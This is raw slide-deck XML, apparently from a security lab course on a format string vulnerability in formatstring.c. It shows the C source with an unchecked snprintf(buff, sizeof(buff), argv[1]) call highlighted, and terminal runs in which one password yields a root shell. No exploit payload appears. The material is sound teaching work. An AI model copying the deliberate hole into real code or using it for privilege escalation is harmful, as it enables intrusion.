          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The secure source code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7464152" y="5589240"/>
            <a:ext cx="4480667" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="2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Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with argument A, you failed.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with argument B, you also failed.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatritng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with argument root123, you get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>the root shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>This is normal behavior...... Now, let’s back to  Step 3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9552384" y="1346390"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7524338" y="2500441"/>
            <a:ext cx="4260294" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7F7F7F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass @ 0xbfffec00, [0][       0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Wrong Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass @ 0xbfffec00, [0][       0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Wrong Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  root123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass @ 0xbfffec00, [0][       0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Correct Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Root privileges  given to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33524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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33"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5">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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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15">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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xEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43"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923407"/>
            <a:ext cx="5472608" cy="729430"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check the vulnerable code of the source file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5407213"/>
            <a:ext cx="9144000"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sz="1400" kern="0" dirty="0"/>
              <a:t>Then, go to the /sec directory.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="1714873"/>
            <a:ext cx="5418108" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> []) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> pass = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     char buff [512]; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> &lt;2) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "Failed: Usage [% s password] \ n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> [0]); return 1; } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1]); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "pass @% # 8x, [% d] [% # 8x] \ n", &amp; pass, pass, pass); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
